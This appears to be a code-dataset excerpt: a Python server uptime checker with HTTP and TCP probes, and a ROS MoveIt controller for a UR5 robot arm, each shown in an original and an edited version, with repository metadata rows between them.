timeout = config['timeout']
url = config['url']
valid_status = config['validStatus']
record = server.new_record()
try:
r = requests.get(url, timeout=float(timeout) / 1000)
if r.status_code in valid_status:
record.online = True
record.latency = int(r.elapsed / timedelta(milliseconds=1))
else:
record.message = f"Unsuccessful status code: {r.status_code}"
except requests.exceptions.Timeout as e:
record.message = "Timed out"
except requests.exceptions.ConnectionError as e:
record.message = "Connection error"
app.logger.debug("Check failed for [%s]: %s", server.label, e)
except:
e = sys.exc_info()[0]
record.message = str(e)
app.logger.debug("Check failed for [%s]: %s", server.label, e)
return record
def handle_active_tcp(server):
"""
Handler for Active TCP checking
"""
config = server.get_config()
timeout = config['timeout']
address = config['address']
port = config['port']
record = server.new_record()
try:
c = socket.socket()
ip = socket.gethostbyname(address)
c.settimeout(int(timeout / 1000))
start = datetime.now()
c.connect((ip, port))
end = datetime.now()
c.close()
record.online = True
record.latency = (end - start) / timedelta(milliseconds=1)
except Exception as e:
record.message = str(e)
return record
def handle_server(server):
"""
Common handler for any server
"""
config = server.get_config()
interval = config['interval']
last_record = server.last_record()
if last_record and not last_record.expired(interval):
return
log_start(server)
record = handlers[server.mode](server)
log_record(record)
with transaction():
db.session.add(record)
signal_new_record.send(record=record)
if last_record and record.online != last_record.online:
log_state_changed(server, record)
notify_state_changed(server, record)
handlers = {
'active-http': handle_active_http,
'passive-http': handle_passive_http,
'active-tcp': handle_active_tcp
}
signals = Namespace()
signal_new_record = signals.signal('new-record') | 26.9 | 79 | 0.644838 | from app import app
import requests, sys, eventlet, socket
from datetime import datetime, timedelta
from .db import Server, Record, transaction, db
from .notify import notify_state_changed
from blinker import Namespace
def log_start(server):
    """Debug-log that a check run is starting for *server*."""
    app.logger.debug("Start checking [%s](%s)", server.label, server.id)
def log_record(record):
    """Debug-log whether *record*'s server was observed online or offline."""
    if record.online:
        app.logger.debug("%d is online", record.server_id)
    else:
        app.logger.debug("%d is offline: %s", record.server_id, record.message)
def log_state_changed(server, record):
    """Info-log an online/offline transition detected for *server*."""
    app.logger.info("State of %s changed, online: %s", server.label,
                    str(record.online))
def handle_active_http(server):
    """
    Handler for Active HTTP checking.

    Performs a GET against the configured URL; on an accepted status code the
    record is marked online with latency in milliseconds, otherwise a failure
    message is stored. Always returns the (unsaved) record.

    Fix: the final handler was a bare ``except:`` (which also swallowed
    SystemExit/KeyboardInterrupt) and used ``sys.exc_info()[0]`` — the
    exception *class* — as the message; it now catches Exception and records
    the exception instance.
    """
    config = server.get_config()
    timeout = config['timeout']
    url = config['url']
    valid_status = config['validStatus']
    record = server.new_record()
    try:
        # timeout is configured in milliseconds; requests expects seconds.
        r = requests.get(url, timeout=float(timeout) / 1000)
        if r.status_code in valid_status:
            record.online = True
            record.latency = int(r.elapsed / timedelta(milliseconds=1))
        else:
            record.message = f"Unsuccessful status code: {r.status_code}"
    except requests.exceptions.Timeout:
        record.message = "Timed out"
    except requests.exceptions.ConnectionError as e:
        record.message = "Connection error"
        app.logger.debug("Check failed for [%s]: %s", server.label, e)
    except Exception as e:
        record.message = str(e)
        app.logger.debug("Check failed for [%s]: %s", server.label, e)
    return record
def handle_active_tcp(server):
    """
    Handler for Active TCP checking.

    Opens a TCP connection to the configured address/port and records the
    connect latency in milliseconds, or a failure message on error.

    Fixes: the socket was only closed on the success path (leaked whenever
    resolution/connect raised), and ``int(timeout / 1000)`` truncated
    sub-second timeouts to 0 — i.e. non-blocking mode — instead of keeping
    the fractional seconds.
    """
    config = server.get_config()
    timeout = config['timeout']
    address = config['address']
    port = config['port']
    record = server.new_record()
    try:
        c = socket.socket()
        try:
            ip = socket.gethostbyname(address)
            # timeout is configured in milliseconds; keep fractions.
            c.settimeout(timeout / 1000.0)
            start = datetime.now()
            c.connect((ip, port))
            end = datetime.now()
            record.online = True
            record.latency = (end - start) / timedelta(milliseconds=1)
        finally:
            c.close()  # release the socket on every path
    except Exception as e:
        record.message = str(e)
    return record
def handle_passive_http(server):
    """Handler for Passive HTTP checking — placeholder, not implemented yet."""
    # print(server)
    pass
def handle_server(server):
    """
    Common handler for any server.

    Skips the check while the previous record is still fresh (within the
    configured interval); otherwise runs the mode-specific handler, persists
    the new record, emits the new-record signal, and notifies when the
    online state flipped.
    """
    config = server.get_config()
    interval = config['interval']
    last_record = server.last_record()
    # Rate limit: do nothing while the last record has not expired yet.
    if last_record and not last_record.expired(interval):
        return
    log_start(server)
    # Dispatch to the checker registered for this server's mode.
    record = handlers[server.mode](server)
    log_record(record)
    with transaction():
        db.session.add(record)
    signal_new_record.send(record=record)
    # Notify only on an actual online/offline transition.
    if last_record and record.online != last_record.online:
        log_state_changed(server, record)
        notify_state_changed(server, record)
def task_check():
    """Run one checking pass: spawn a green thread per enabled server and wait."""
    enabled_servers = Server.query.filter_by(enabled=True).all()
    greenlets = [eventlet.spawn(handle_server, srv) for srv in enabled_servers]
    for greenlet in greenlets:
        try:
            greenlet.wait()
        except Exception as e:
            app.logger.error("Error when running task for server: %s", e)
# Dispatch table mapping a server's `mode` string to its checking handler.
handlers = {
    'active-http': handle_active_http,
    'passive-http': handle_passive_http,
    'active-tcp': handle_active_tcp
}
# Blinker signal namespace; 'new-record' is sent after a record is persisted.
signals = Namespace()
signal_new_record = signals.signal('new-record')
778192d1dd5ce7f3a6e52e024267de15e2f06d4c | 14,970 | py | Python | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | 1 | 2021-09-09T04:41:28.000Z | 2021-09-09T04:41:28.000Z | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | null | null | null | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | null | null | null | #! /usr/bin/env python2.7
"""
This file contain Ur5Moveit class to control bot and rviz planning scene.
"""
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
from pkg_vb_sim.srv import conveyorBeltPowerMsg
import math
import sys
import copy
from std_srvs.srv import Empty
import sys
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from pyzbar.pyzbar import decode
def define_joint_angle_list(shoulder_pan_joint, shoulder_lift_joint, elbow_joint, wrist_1_joint, wrist_2_joint, wrist_3_joint):
    """
    Convert the six UR5 joint angles from degrees to radians.

    :param shoulder_pan_joint: shoulder pan joint angle (degrees)
    :param shoulder_lift_joint: shoulder lift joint angle (degrees)
    :param elbow_joint: elbow joint angle (degrees)
    :param wrist_1_joint: wrist 1 joint angle (degrees)
    :param wrist_2_joint: wrist 2 joint angle (degrees)
    :param wrist_3_joint: wrist 3 joint angle (degrees)
    :return: list of the six joint angles in radians, in the same order.
    """
    degrees = (shoulder_pan_joint, shoulder_lift_joint, elbow_joint,
               wrist_1_joint, wrist_2_joint, wrist_3_joint)
    return [math.radians(angle) for angle in degrees]
def define_pose(x, y, z):
    """
    Build a geometry_msgs.msg.Pose() at the given position.

    The orientation is a fixed quaternion (-0.5, -0.5, 0.5, 0.5) used
    throughout this module for the end-effector attitude.

    :param x: x coordinate
    :param y: y coordinate
    :param z: z coordinate
    :return: geometry_msgs.msg.Pose() with the position and fixed orientation.
    """
    pose = geometry_msgs.msg.Pose()
    pose.position.x, pose.position.y, pose.position.z = x, y, z
    pose.orientation.x = -0.5
    pose.orientation.y = -0.5
    pose.orientation.z = 0.5
    pose.orientation.w = 0.5
    return pose
def get_item_details(item):
    """
    Look up shipping metadata for a packgen content type.

    :param item: string naming the packgen content ('Medicines', 'Food', ...)
    :return: dict with keys 'priority', 'cost', 'Estimated Time of Delivery'
             and 'item'; every value is 'Na' for unrecognised items.
    """
    medicines = {'priority': 'HP', 'cost': '450',
                 'Estimated Time of Delivery': '1', 'item': 'Medicines'}
    catalogue = {
        u'Medicines': medicines,
        u'Medicine': medicines,
        u'Food': {'priority': 'MP', 'cost': '250',
                  'Estimated Time of Delivery': '3', 'item': 'Food'},
        u'Clothes': {'priority': 'LP', 'cost': '150',
                     'Estimated Time of Delivery': '5', 'item': 'Clothes'},
    }
    unknown = {'Estimated Time of Delivery': 'Na', 'priority': 'Na',
               'cost': 'Na', 'item': 'Na'}
    # Copy so each call returns a fresh, independently mutable dict.
    return dict(catalogue.get(item, unknown))
class Ur5Moveit:
"""
This class enables bot and rviz connection, and setup the configuration of ur5 bot.
Select bot name, planning group ,etc.
"""
def __init__(self,robot_name):
"""
Constructor
:param robot_name: name of bot which you want to control.
"""
self.is_conver_active = False
self._box_name = 'box'
self.box_name = 'box'
self._robot_ns = '/'+robot_name
self._planning_group = "manipulator"
self._commander = moveit_commander.roscpp_initialize(sys.argv)
self._robot = moveit_commander.RobotCommander(robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
self._group = moveit_commander.MoveGroupCommander(self._planning_group, robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._display_trajectory_publisher = rospy.Publisher( self._robot_ns + '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=1)
self._exectute_trajectory_client = actionlib.SimpleActionClient( self._robot_ns + '/execute_trajectory', moveit_msgs.msg.ExecuteTrajectoryAction)
self._exectute_trajectory_client.wait_for_server()
self._planning_frame = self._group.get_planning_frame()
self._eef_link = self._group.get_end_effector_link()
self._group_names = self._robot.get_group_names()
self._computed_plan = ''
# Current State of the Robot is needed to add box to planning scene
self._curr_state = self._robot.get_current_state()
rospy.loginfo('\033[94m' + "Planning Group: {}".format(self._planning_frame) + '\033[0m')
rospy.loginfo('\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
rospy.loginfo('\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
rospy.loginfo('\033[94m' + " >>> ur5_moveit init done." + '\033[0m')
@property
def ee_cartesian_translation(self, trans_x, trans_y, trans_z):
"""
This function helps in translating bot in x,y,z direction using cartesian coordinate system.
:param trans_x: Displacement in x direction.
:param trans_y: Displacement in y direction.
:param trans_z: Displacement in z direction.
"""
# 1. Create a empty list to hold waypoints
waypoints = [self._group.get_current_pose().pose]
# 2. Add Current Pose to the list of waypoints
# 3. Create a New waypoint
wpose = geometry_msgs.msg.Pose()
wpose.position.x = waypoints[0].position.x + trans_x
wpose.position.y = waypoints[0].position.y + trans_y
wpose.position.z = waypoints[0].position.z + trans_z
# This to keep EE parallel to Ground Plane
wpose.orientation.x = -0.5
wpose.orientation.y = -0.5
wpose.orientation.z = 0.5
wpose.orientation.w = 0.5
# 4. Add the new waypoint to the list of waypoints
waypoints.append(copy.deepcopy(wpose))
# 5. Compute Cartesian Path connecting the waypoints in the list of waypoints
(plan, fraction) = self._group.compute_cartesian_path(
waypoints, # waypoints to follow
0.01, # Step Size, distance between two adjacent computed waypoints will be 1 cm
0.0) # Jump Threshold
rospy.loginfo("Path computed successfully. Moving the arm.")
# The reason for deleting the first two waypoints from the computed Cartesian Path can be found here,
# https://answers.ros.org/question/253004/moveit-problem-error-trajectory-message-contains-waypoints-that-are-not-strictly-increasing-in-time/?answer=257488#post-id-257488
num_pts = len(plan.joint_trajectory.points)
if num_pts >= 3:
del plan.joint_trajectory.points[0]
del plan.joint_trajectory.points[1]
# 6. Make the arm follow the Computed Cartesian Path
self._group.execute(plan)
def wait_for_state_update(self, box_is_known=False, box_is_attached=False,box_name='box', timeout=4):
"""
Check status of box in rviz
:param timeout: time period
:param box_is_known: State of box
:param box_is_attached: State of box
:param box_name: Name of box in rviz
:return: boolean
"""
box_name = box_name or self.box_name
scene = self._scene
start = rospy.get_time()
seconds = rospy.get_time()
while (seconds - start < timeout) and not rospy.is_shutdown():
# Test if the box is in attached objects
attached_objects = scene.get_attached_objects([box_name])
is_attached = len(attached_objects.keys()) > 0
# Test if the box is in the scene.
# Note that attaching the box will remove it from known_objects
is_known = box_name in scene.get_known_object_names()
# Test if we are in the expected state
if (box_is_attached == is_attached) and (box_is_known == is_known):
print("box is attached")
return True
# Sleep so that we give other threads time on the processor
rospy.sleep(0.1)
# If we exited the while loop without returning then we timed out
return False
## END_SUB_TUTORIAL
def add_box(self,x,y,z,b_name):
"""
This function adds a box in rviz planning scene.
:param x: x coordinate of box
:param y: y coordinate of box
:param z: z coordinate of box
:param b_name: name to be given to the box in planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
box_pose = geometry_msgs.msg.PoseStamped()
box_pose.header.frame_id = "world"
box_pose.pose.orientation.w = 0.0
box_pose.pose.position.x = x #0.02
box_pose.pose.position.y = y # 0.45
box_pose.pose.position.z = z
scene.add_box(box_name, box_pose, size=(0.15, 0.15, 0.15))
self.box_name=box_name
return self.wait_for_state_update(box_is_known=True, box_name=box_name,timeout=4)
def attach_box(self,b_name, timeout=4):
"""
This function attach to box with vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be attached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
robot = self._robot
scene = self._scene
eef_link = self._eef_link
grasping_group = self._planning_group
touch_links = robot.get_link_names(group=grasping_group)
scene.attach_box(eef_link, box_name, touch_links=touch_links)
return self.wait_for_state_update(box_is_attached=True, box_is_known=False,box_name=box_name, timeout=timeout)
def detach_box(self,b_name, timeout=4):
"""
This function detach to box from vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be detached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
eef_link = self._eef_link
scene.remove_attached_object(eef_link, name=box_name)
# We wait for the planning scene to update.
return self.wait_for_state_update(box_is_known=True, box_is_attached=False,box_name=box_name, timeout=timeout)
def remove_box(self,b_name, timeout=4):
"""
This function removes box form rviz planning scene.
:param timeout: time period
:param b_name: name of box which need to be removed from planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
scene.remove_world_object(box_name)
return self.wait_for_state_update(box_is_attached=False, box_is_known=False,box_name=box_name, timeout=timeout)
def go_to_pose(self, arg_pose):
"""
This function plans path to a pose and move ur5 to that pose.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:return: boolean
"""
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Current Pose:" + '\033[0m')
rospy.loginfo(pose_values)
self._group.set_pose_target(arg_pose)
flag_plan = self._group.go(wait=True) # wait=False for Async Move
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Final Pose:" + '\033[0m')
rospy.loginfo(pose_values)
list_joint_values = self._group.get_current_joint_values()
rospy.loginfo('\033[94m' + ">>> Final Joint Values:" + '\033[0m')
rospy.loginfo(list_joint_values)
if flag_plan:
rospy.loginfo('\033[94m' + ">>> go_to_pose_angle() Success" + '\033[0m')
else:
rospy.logerr(
'\033[94m' + ">>> go_to_pose() Failed. Solution for Pose not Found." + '\033[0m')
return flag_plan
def hard_go_to_pose(self, arg_pose, arg_max_attempts):
"""
This function calls go_to_pose() function multiple time until it succeed or reaches maximum attempt limit.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:param arg_max_attempts: maximum attempts for calling go_to_pose()
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.go_to_pose(arg_pose)
rospy.logwarn("attempts: {}".format(number_attempts) )
return flag_success
def set_joint_angles(self, arg_list_joint_angles):
"""
This function sets angle of each joint of ur5 to reach a specific position.
:param arg_list_joint_angles: list of joints
:return: boolean
"""
self._group.set_joint_value_target(arg_list_joint_angles)
self._computed_plan = self._group.plan()
flag_plan = self._group.go(wait=True)
if flag_plan:
rospy.loginfo(
'\033[94m' + ">>> set_joint_angles() Success" + '\033[0m')
else:
rospy.logerr(
'\033[94m' + ">>> set_joint_angles() Failed." + '\033[0m')
return flag_plan
def hard_set_joint_angles(self, arg_list_joint_angles, arg_max_attempts):
"""
This function calls set_joint_angles() multiple times until it succeed or reaches maximum attempt limit
:param arg_list_joint_angles: list of all joint angles
:param arg_max_attempts: maximum attempt
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.set_joint_angles(arg_list_joint_angles)
rospy.logwarn("attempts: {}".format(number_attempts) )
# self.clear_octomap()
return flag_success
def trigger_converbelt(self,value):
"""
this function sets belt speed using ros service
:param value: value of speed.
:return: null
"""
x = rospy.ServiceProxy('eyrc/vb/conveyor/set_power', conveyorBeltPowerMsg)
y = x(value)
print(y)
self.is_conver_active = value
def __del__(self):
"""
Destructor
:return: null
"""
moveit_commander.roscpp_shutdown()
rospy.loginfo(
'\033[94m' + "Object of class ur5_moveit Deleted." + '\033[0m')
| 38.48329 | 179 | 0.64676 | #! /usr/bin/env python2.7
"""
This file contain Ur5Moveit class to control bot and rviz planning scene.
"""
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
from pkg_vb_sim.srv import conveyorBeltPowerMsg
import math
import sys
import copy
from std_srvs.srv import Empty
import sys
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from pyzbar.pyzbar import decode
def define_joint_angle_list(shoulder_pan_joint, shoulder_lift_joint, elbow_joint, wrist_1_joint, wrist_2_joint, wrist_3_joint):
"""
This function takes float values for each joint and returns a list.
:param shoulder_pan_joint: shoulder pan joint angle
:param shoulder_lift_joint: shoulder lift join angle
:param elbow_joint: elbow joint angle
:param wrist_1_joint: wrist 1 joint angle
:param wrist_2_joint: wrist 2 joint angle
:param wrist_3_joint: wrist 3 joint angle
:return: list of all joint angles
"""
joint_angles = [math.radians(shoulder_pan_joint),
math.radians(shoulder_lift_joint),
math.radians(elbow_joint),
math.radians(wrist_1_joint),
math.radians(wrist_2_joint),
math.radians(wrist_3_joint)]
return joint_angles
def define_pose(x, y, z):
"""
This function define geometry_msgs.msg.Pose() from giving coordinates.
:param x: x coordinate
:param y: y coordinate
:param z: z coordinate
:return: ur5_pose of type geometry_msgs.msg.Pose() containing x,y,z coordinate.
"""
ur5_pose = geometry_msgs.msg.Pose()
ur5_pose.position.x = x
ur5_pose.position.y = y
ur5_pose.position.z = z
ur5_pose.orientation.x = -0.5
ur5_pose.orientation.y = -0.5
ur5_pose.orientation.z = 0.5
ur5_pose.orientation.w = 0.5
return ur5_pose
def get_item_details(item):
"""
This function finds packgen details using item
:param item: item is a string containing packgen content type
:return: it returns dict of details of packgen.
"""
details = {'Estimated Time of Delivery':'Na','priority':'Na','cost':'Na','item':'Na'}
if item == u'Medicines' or item == u'Medicine':
details = {'priority':'HP','cost':'450','Estimated Time of Delivery':'1','item':'Medicines'}
elif item == u'Food':
details = {'priority':'MP','cost':'250','Estimated Time of Delivery':'3',"item":'Food'}
elif item == u'Clothes':
details = {'priority':'LP','cost':'150','Estimated Time of Delivery':'5','item':'Clothes'}
return details
class Ur5Moveit:
    """
    Wrapper around MoveIt for a single UR5 arm running in its own ROS
    namespace.

    Sets up the robot/RViz connection and the planning-group configuration
    (robot name, planning group, trajectory-execution action client, scene
    interface), and exposes helpers for Cartesian moves, pose/joint targets,
    planning-scene boxes and the conveyor-belt service.
    """

    def __init__(self, robot_name):
        """
        Constructor.

        :param robot_name: name of bot which you want to control; used to
            derive the ROS namespace of all MoveIt topics/services.
        """
        # Conveyor-belt power flag/value, updated by trigger_converbelt().
        self.is_conver_active = False
        self._box_name = 'box'
        self.box_name = 'box'
        self._robot_ns = '/' + robot_name
        self._planning_group = "manipulator"
        self._commander = moveit_commander.roscpp_initialize(sys.argv)
        self._robot = moveit_commander.RobotCommander(
            robot_description=self._robot_ns + "/robot_description", ns=self._robot_ns)
        self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
        self._group = moveit_commander.MoveGroupCommander(
            self._planning_group,
            robot_description=self._robot_ns + "/robot_description", ns=self._robot_ns)
        self._display_trajectory_publisher = rospy.Publisher(
            self._robot_ns + '/move_group/display_planned_path',
            moveit_msgs.msg.DisplayTrajectory, queue_size=1)
        self._exectute_trajectory_client = actionlib.SimpleActionClient(
            self._robot_ns + '/execute_trajectory',
            moveit_msgs.msg.ExecuteTrajectoryAction)
        # Block until the trajectory-execution action server is available.
        self._exectute_trajectory_client.wait_for_server()
        self._planning_frame = self._group.get_planning_frame()
        self._eef_link = self._group.get_end_effector_link()
        self._group_names = self._robot.get_group_names()
        self._computed_plan = ''
        # Current State of the Robot is needed to add box to planning scene
        self._curr_state = self._robot.get_current_state()
        rospy.loginfo('\033[94m' + "Planning Group: {}".format(self._planning_frame) + '\033[0m')
        rospy.loginfo('\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
        rospy.loginfo('\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
        rospy.loginfo('\033[94m' + " >>> ur5_moveit init done." + '\033[0m')

    @property
    def group(self):
        """MoveGroupCommander for the configured planning group."""
        return self._group

    def ee_cartesian_translation(self, trans_x, trans_y, trans_z):
        """
        Translate the end effector by (trans_x, trans_y, trans_z) along a
        Cartesian path while keeping the EE parallel to the ground plane.

        :param trans_x: Displacement in x direction.
        :param trans_y: Displacement in y direction.
        :param trans_z: Displacement in z direction.
        """
        # 1. Create a list of waypoints seeded with the current pose.
        waypoints = [self._group.get_current_pose().pose]
        # 2. Create the target waypoint, offset from the current pose.
        wpose = geometry_msgs.msg.Pose()
        wpose.position.x = waypoints[0].position.x + trans_x
        wpose.position.y = waypoints[0].position.y + trans_y
        wpose.position.z = waypoints[0].position.z + trans_z
        # This to keep EE parallel to Ground Plane
        wpose.orientation.x = -0.5
        wpose.orientation.y = -0.5
        wpose.orientation.z = 0.5
        wpose.orientation.w = 0.5
        # 3. Add the new waypoint to the list of waypoints
        waypoints.append(copy.deepcopy(wpose))
        # 4. Compute Cartesian Path connecting the waypoints in the list
        (plan, fraction) = self._group.compute_cartesian_path(
            waypoints,  # waypoints to follow
            0.01,       # Step Size, distance between two adjacent computed waypoints will be 1 cm
            0.0)        # Jump Threshold
        rospy.loginfo("Path computed successfully. Moving the arm.")
        # The reason for deleting the first two waypoints from the computed Cartesian Path can be found here,
        # https://answers.ros.org/question/253004/moveit-problem-error-trajectory-message-contains-waypoints-that-are-not-strictly-increasing-in-time/?answer=257488#post-id-257488
        num_pts = len(plan.joint_trajectory.points)
        if num_pts >= 3:
            # Bug fix: `del points[0]` followed by `del points[1]` removed
            # original indices 0 and 2 (indices shift after the first del).
            # Delete the first two points as the comment above intends.
            del plan.joint_trajectory.points[0:2]
        # 5. Make the arm follow the Computed Cartesian Path
        self._group.execute(plan)

    def wait_for_state_update(self, box_is_known=False, box_is_attached=False, box_name='box', timeout=4):
        """
        Poll the planning scene until the box reaches the expected state or
        the timeout expires.

        :param box_is_known: expected "present in scene" state of the box
        :param box_is_attached: expected "attached to EE" state of the box
        :param box_name: Name of box in rviz
        :param timeout: time period in seconds
        :return: True if the expected state was observed, False on timeout
        """
        box_name = box_name or self.box_name
        scene = self._scene
        start = rospy.get_time()
        seconds = rospy.get_time()
        while (seconds - start < timeout) and not rospy.is_shutdown():
            # Test if the box is in attached objects
            attached_objects = scene.get_attached_objects([box_name])
            is_attached = len(attached_objects.keys()) > 0
            # Test if the box is in the scene.
            # Note that attaching the box will remove it from known_objects
            is_known = box_name in scene.get_known_object_names()
            # Test if we are in the expected state
            if (box_is_attached == is_attached) and (box_is_known == is_known):
                print("box is attached")
                return True
            # Sleep so that we give other threads time on the processor
            rospy.sleep(0.1)
            # Bug fix: refresh the clock, otherwise `seconds` stays at its
            # initial value and the timeout condition can never trigger.
            seconds = rospy.get_time()
        # If we exited the while loop without returning then we timed out
        return False
    ## END_SUB_TUTORIAL

    def add_box(self, x, y, z, b_name):
        """
        Add a 15 cm cube to the rviz planning scene.

        :param x: x coordinate of box
        :param y: y coordinate of box
        :param z: z coordinate of box
        :param b_name: name to be given to the box in planning scene
        :return: boolean, True once the scene reflects the new box
        """
        box_name = b_name or self.box_name
        scene = self._scene
        box_pose = geometry_msgs.msg.PoseStamped()
        box_pose.header.frame_id = "world"
        # NOTE(review): w = 0.0 with all other components zero is not a valid
        # (unit) quaternion; the identity orientation would be w = 1.0.
        # Kept as-is to preserve existing behavior -- confirm intent.
        box_pose.pose.orientation.w = 0.0
        box_pose.pose.position.x = x  # 0.02
        box_pose.pose.position.y = y  # 0.45
        box_pose.pose.position.z = z
        scene.add_box(box_name, box_pose, size=(0.15, 0.15, 0.15))
        self.box_name = box_name
        return self.wait_for_state_update(box_is_known=True, box_name=box_name, timeout=4)

    def attach_box(self, b_name, timeout=4):
        """
        Attach the box to the vacuum gripper in the rviz planning scene so
        that contact between gripper and box is not reported as a collision.

        :param b_name: box name which needs to be attached.
        :param timeout: time period
        :return: boolean
        """
        box_name = b_name or self.box_name
        robot = self._robot
        scene = self._scene
        eef_link = self._eef_link
        grasping_group = self._planning_group
        # Links of the grasping group may touch the box without it counting
        # as a collision.
        touch_links = robot.get_link_names(group=grasping_group)
        scene.attach_box(eef_link, box_name, touch_links=touch_links)
        return self.wait_for_state_update(box_is_attached=True, box_is_known=False, box_name=box_name, timeout=timeout)

    def detach_box(self, b_name, timeout=4):
        """
        Detach the box from the vacuum gripper in the rviz planning scene.

        :param b_name: box name which needs to be detached.
        :param timeout: time period
        :return: boolean
        """
        box_name = b_name or self.box_name
        scene = self._scene
        eef_link = self._eef_link
        scene.remove_attached_object(eef_link, name=box_name)
        # We wait for the planning scene to update.
        return self.wait_for_state_update(box_is_known=True, box_is_attached=False, box_name=box_name, timeout=timeout)

    def remove_box(self, b_name, timeout=4):
        """
        Remove the box from the rviz planning scene.

        :param b_name: name of box which need to be removed from planning scene
        :param timeout: time period
        :return: boolean
        """
        box_name = b_name or self.box_name
        scene = self._scene
        scene.remove_world_object(box_name)
        return self.wait_for_state_update(box_is_attached=False, box_is_known=False, box_name=box_name, timeout=timeout)

    def go_to_pose(self, arg_pose):
        """
        Plan a path to the given pose and move the ur5 there.

        :param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
        :return: boolean, True when a plan was found and executed
        """
        pose_values = self._group.get_current_pose().pose
        rospy.loginfo('\033[94m' + ">>> Current Pose:" + '\033[0m')
        rospy.loginfo(pose_values)
        self._group.set_pose_target(arg_pose)
        flag_plan = self._group.go(wait=True)  # wait=False for Async Move
        pose_values = self._group.get_current_pose().pose
        rospy.loginfo('\033[94m' + ">>> Final Pose:" + '\033[0m')
        rospy.loginfo(pose_values)
        list_joint_values = self._group.get_current_joint_values()
        rospy.loginfo('\033[94m' + ">>> Final Joint Values:" + '\033[0m')
        rospy.loginfo(list_joint_values)
        if flag_plan:
            # Bug fix: the success message previously referred to
            # "go_to_pose_angle()", which does not exist.
            rospy.loginfo('\033[94m' + ">>> go_to_pose() Success" + '\033[0m')
        else:
            rospy.logerr(
                '\033[94m' + ">>> go_to_pose() Failed. Solution for Pose not Found." + '\033[0m')
        return flag_plan

    def hard_go_to_pose(self, arg_pose, arg_max_attempts):
        """
        Call go_to_pose() repeatedly until it succeeds or the maximum number
        of attempts is reached.

        :param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
        :param arg_max_attempts: maximum attempts for calling go_to_pose()
        :return: boolean, True on the first successful attempt
        """
        number_attempts = 0
        flag_success = False
        while (number_attempts <= arg_max_attempts) and (flag_success is False):
            number_attempts += 1
            flag_success = self.go_to_pose(arg_pose)
            rospy.logwarn("attempts: {}".format(number_attempts))
        return flag_success

    def clear_octomap(self):
        """Clear the MoveIt octomap (collision map) via the ROS service."""
        clear_octomap_service_proxy = rospy.ServiceProxy(self._robot_ns + "/clear_octomap", Empty)
        return clear_octomap_service_proxy()

    def set_joint_angles(self, arg_list_joint_angles):
        """
        Move the ur5 to the configuration given by the joint angles.

        :param arg_list_joint_angles: list of joint angle targets
        :return: boolean, True when planning/execution succeeded
        """
        self._group.set_joint_value_target(arg_list_joint_angles)
        self._computed_plan = self._group.plan()
        flag_plan = self._group.go(wait=True)
        if flag_plan:
            rospy.loginfo(
                '\033[94m' + ">>> set_joint_angles() Success" + '\033[0m')
        else:
            rospy.logerr(
                '\033[94m' + ">>> set_joint_angles() Failed." + '\033[0m')
        return flag_plan

    def hard_set_joint_angles(self, arg_list_joint_angles, arg_max_attempts):
        """
        Call set_joint_angles() repeatedly until it succeeds or the maximum
        number of attempts is reached.

        :param arg_list_joint_angles: list of all joint angles
        :param arg_max_attempts: maximum attempt
        :return: boolean
        """
        number_attempts = 0
        flag_success = False
        while (number_attempts <= arg_max_attempts) and (flag_success is False):
            number_attempts += 1
            flag_success = self.set_joint_angles(arg_list_joint_angles)
            rospy.logwarn("attempts: {}".format(number_attempts))
            # self.clear_octomap()
        return flag_success

    def trigger_converbelt(self, value):
        """
        Set the conveyor-belt speed via the ROS service.

        :param value: value of speed.
        :return: null
        """
        x = rospy.ServiceProxy('eyrc/vb/conveyor/set_power', conveyorBeltPowerMsg)
        y = x(value)
        print(y)
        self.is_conver_active = value

    def __del__(self):
        """
        Destructor: shut down the MoveIt commander.

        :return: null
        """
        moveit_commander.roscpp_shutdown()
        rospy.loginfo(
            '\033[94m' + "Object of class ur5_moveit Deleted." + '\033[0m')
| 169 | 0 | 53 |
8145aa16391086be18b4c1e44f2aca985e32f12d | 8,452 | py | Python | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
